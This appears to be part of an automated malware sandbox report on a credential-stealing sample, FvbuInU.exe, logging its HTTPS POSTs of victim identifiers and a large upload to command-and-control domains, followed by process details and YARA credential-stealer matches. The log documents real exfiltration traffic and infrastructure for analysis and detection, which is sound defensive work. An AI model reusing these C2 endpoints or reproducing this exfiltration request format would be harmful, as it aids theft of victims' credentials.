2025-03-07 18:37:46 UTC | 15331 | OUT | Data Raw: 2d 2d 51 51 42 5a 6f 4d 36 54 64 56 32 76 5a 31 6b 76 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 0d 0a 2d 2d 51 51 42 5a 6f 4d 36 54 64 56 32 76 5a 31 6b 76 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 51 42 5a 6f 4d 36 54 64 56 32 76 5a 31 6b 76 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 39 32 30 37 44 35 32 32
                                                                    Data Ascii: --QQBZoM6TdV2vZ1kvPContent-Disposition: form-data; name="uid"9c3be6f4c5e0a94b189ca0d8299f35fd794488--QQBZoM6TdV2vZ1kvPContent-Disposition: form-data; name="pid"3--QQBZoM6TdV2vZ1kvPContent-Disposition: form-data; name="hwid"D69207D522
                                                                    2025-03-07 18:37:46 UTC | 4617 | OUT | Data Raw: eb f6 89 14 b7 46 f7 45 72 72 63 ea 36 90 25 88 51 ad 1d f2 9a 1b 17 dc 1e 61 a4 49 70 93 8d 1d 43 75 f6 f4 f3 9a db 15 ba eb ff 1c 26 fb 57 ce 32 9a 7e 7d 50 bd d6 eb e5 9b 12 1e 14 79 21 12 9e b3 a2 04 df 65 ec 86 51 72 2b 21 53 d9 57 c4 7e 98 f1 fa 68 9b 1e d4 3c fd 27 50 c3 34 74 54 62 9b 21 c0 2f 3c 8d 8c 43 82 e5 ea 8c 66 19 f8 22 9b c3 d3 65 f9 29 2c 92 8b b1 0a b3 d1 6b 79 a8 f7 3e ae 5f 80 ca 47 c7 72 36 00 82 2b 71 42 e1 f5 ba 46 80 88 a3 63 67 22 0f 25 02 c6 ac c1 e3 f3 bb dc 64 fd c5 e1 2c 90 83 02 cb 0d 14 1f 24 f5 8f 0e 49 41 06 29 92 9d 88 92 9f 5f 6c 1c 50 ac e7 ea 6c 91 3f 1d 2c 9f b3 2b 9e e8 a0 f6 7c 5b 24 52 dc b6 21 4d 8b c4 5b 83 00 53 6e 1a 1f 4f 11 12 5b 38 2a bb a2 4c b9 2f ee be 9e cd 31 6f ac 1c 09 e4 cc 7a a9 23 f0 81 09 ed b4
                                                                    Data Ascii: FErrc6%QaIpCu&W2~}Py!eQr+!SW~h<'P4tTb!/<Cf"e),ky>_Gr6+qBFcg"%d,$IA)_lPl?,+|[$R!M[SnO[8*L/1oz#
                                                                    2025-03-07 18:37:47 UTC | 823 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 07 Mar 2025 18:37:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=knS7czeuF%2BdUkheJc9t0gJXNDJjNEN9%2BwjRu93hkRgsVvV2rnuzlIj0X%2BWA8SGsyW0I5Ts1HnlDqxt%2F4GkzLK%2FjqNJlxTOj3rTR%2FLpkklZ%2F4%2FOzqsrLfhSNQeY267M5hz6%2Ba"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 91cc34bd5de08723-ORD
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=586&min_rtt=585&rtt_var=223&sent=14&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=20911&delivery_rate=6601001&cwnd=252&unsent_bytes=0&cid=8ac79774c131e36d&ts=1432&x=0"
                                                                    2025-03-07 18:37:47 UTC | 76 | IN | Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 33 38 2e 31 39 39 2e 34 32 2e 31 36 34 22 7d 7d 0d 0a
                                                                    Data Ascii: 46{"success":{"message":"message success delivery from 138.199.42.164"}}
                                                                    2025-03-07 18:37:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    4 | 192.168.2.6 | 49691 | 104.21.53.52 | 443 | 7544 | C:\Users\user\Desktop\FvbuInU.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2025-03-07 18:37:52 UTC | 277 | OUT | POST /aQwdw HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=9XD6Apa4PxGA
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 2530
                                                                    Host: nebdulaq.digital
                                                                    2025-03-07 18:37:52 UTC | 2530 | OUT | Data Raw: 2d 2d 39 58 44 36 41 70 61 34 50 78 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 0d 0a 2d 2d 39 58 44 36 41 70 61 34 50 78 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 58 44 36 41 70 61 34 50 78 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45 44 43 45 41 37 37
                                                                    Data Ascii: --9XD6Apa4PxGAContent-Disposition: form-data; name="uid"9c3be6f4c5e0a94b189ca0d8299f35fd794488--9XD6Apa4PxGAContent-Disposition: form-data; name="pid"1--9XD6Apa4PxGAContent-Disposition: form-data; name="hwid"D69207D5222EDA67E3EDCEA77
                                                                    2025-03-07 18:38:13 UTC | 247 | IN | HTTP/1.1 522 <none>
                                                                    Date: Fri, 07 Mar 2025 18:38:12 GMT
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: cloudflare
                                                                    Cache-Control: private, no-store
                                                                    Cf-Cache-Status: DYNAMIC
                                                                    CF-RAY: 91cc34e78840231e-ORD
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-03-07 18:38:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    5 | 192.168.2.6 | 49694 | 104.21.53.52 | 443 | 7544 | C:\Users\user\Desktop\FvbuInU.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2025-03-07 18:38:15 UTC | 281 | OUT | POST /aQwdw HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=p56hhj6bi9XWGA
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 588308
                                                                    Host: nebdulaq.digital
                                                                    2025-03-07 18:38:15 UTC | 15331 | OUT | Data Raw: 2d 2d 70 35 36 68 68 6a 36 62 69 39 58 57 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 0d 0a 2d 2d 70 35 36 68 68 6a 36 62 69 39 58 57 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 70 35 36 68 68 6a 36 62 69 39 58 57 47 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45
                                                                    Data Ascii: --p56hhj6bi9XWGAContent-Disposition: form-data; name="uid"9c3be6f4c5e0a94b189ca0d8299f35fd794488--p56hhj6bi9XWGAContent-Disposition: form-data; name="pid"1--p56hhj6bi9XWGAContent-Disposition: form-data; name="hwid"D69207D5222EDA67E3E
                                                                    2025-03-07 18:38:21 UTC | 818 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 07 Mar 2025 18:38:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y680HUf5XnB6wS9qu%2BW551MnAz4AXFwLzVkiJ6R%2Ft2fU7MNbu9F4fkpcUNP1NQvOFh2GMxsGshpUe2wPrSrYk0b%2FVR7i3BIddbVhgmbIGBM93tUr8Y211Q%2FcEqzwnD%2BBqadE"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 91cc3576e93b00f8-ORD
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=555&min_rtt=536&rtt_var=168&sent=489&recv=496&lost=0&retrans=0&sent_bytes=2840&recv_bytes=590897&delivery_rate=6713073&cwnd=252&unsent_bytes=0&cid=f7ff881fabf500dc&ts=5702&x=0"


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    6 | 192.168.2.6 | 49695 | 104.21.53.52 | 443 | 7544 | C:\Users\user\Desktop\FvbuInU.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2025-03-07 18:38:23 UTC | 266 | OUT | POST /aQwdw HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 85
                                                                    Host: nebdulaq.digital
                                                                    2025-03-07 18:38:23 UTC | 85 | OUT | Data Raw: 75 69 64 3d 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 26 63 69 64 3d 26 68 77 69 64 3d 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33 34
                                                                    Data Ascii: uid=9c3be6f4c5e0a94b189ca0d8299f35fd794488&cid=&hwid=D69207D5222EDA67E3EDCEA778368E34


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.6 | 49696 | 188.114.96.3 | 443 | 7544 | C:\Users\user\Desktop\FvbuInU.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    2025-03-07 18:38:31 UTC | 269 | OUT | POST /QwdZdf HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 85
                                                                    Host: begindecafer.world
                                                                    2025-03-07 18:38:31 UTC | 85 | OUT | Data Raw: 75 69 64 3d 39 63 33 62 65 36 66 34 63 35 65 30 61 39 34 62 31 38 39 63 61 30 64 38 32 39 39 66 33 35 66 64 37 39 34 34 38 38 26 63 69 64 3d 26 68 77 69 64 3d 44 36 39 32 30 37 44 35 32 32 32 45 44 41 36 37 45 33 45 44 43 45 41 37 37 38 33 36 38 45 33 34
                                                                    Data Ascii: uid=9c3be6f4c5e0a94b189ca0d8299f35fd794488&cid=&hwid=D69207D5222EDA67E3EDCEA778368E34
                                                                    2025-03-07 18:38:32 UTC | 794 | IN | HTTP/1.1 200 OK
                                                                    Date: Fri, 07 Mar 2025 18:38:32 GMT
                                                                    Content-Type: application/octet-stream
                                                                    Content-Length: 43
                                                                    Connection: close
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OByPzbrqHsyvWGSRfh%2BXEghzKxnc4efJsz4QUBsExhM0%2BSXlVT%2Bg7f%2FQrqZOMI5%2FKmsz1spL8C0kVDWuswI%2BAd3miIPMdVSTBxYqHtjWSOZLF%2Bc4F1L%2BkGL4Ub7d5X%2BCwgpMboM%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 91cc35d8ee30873b-ORD
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=540&min_rtt=540&rtt_var=203&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=990&delivery_rate=7281767&cwnd=252&unsent_bytes=0&cid=cbb1af5767ab2f1a&ts=1383&x=0"
                                                                    2025-03-07 18:38:32 UTC | 43 | IN | Data Raw: 8e 45 d0 8f c0 77 a0 7a 34 df da bd f0 8c b0 73 2f 00 d1 79 71 e9 2c 2e c6 bb 4b ae 60 e2 a0 97 66 4c 8d 83 24 14 7e 17 85 f4 ea
                                                                    Data Ascii: Ewz4s/yq,.K`fL$~


                                                                    Target ID:0
                                                                    Start time:13:37:26
                                                                    Start date:07/03/2025
                                                                    Path:C:\Users\user\Desktop\FvbuInU.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\FvbuInU.exe"
                                                                    Imagebase:0xd60000
                                                                    File size:2'090'496 bytes
                                                                    MD5 hash:A4069F02CDD899C78F3A4EE62EA9A89A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1531650734.0000000001590000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1531596694.00000000015D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true
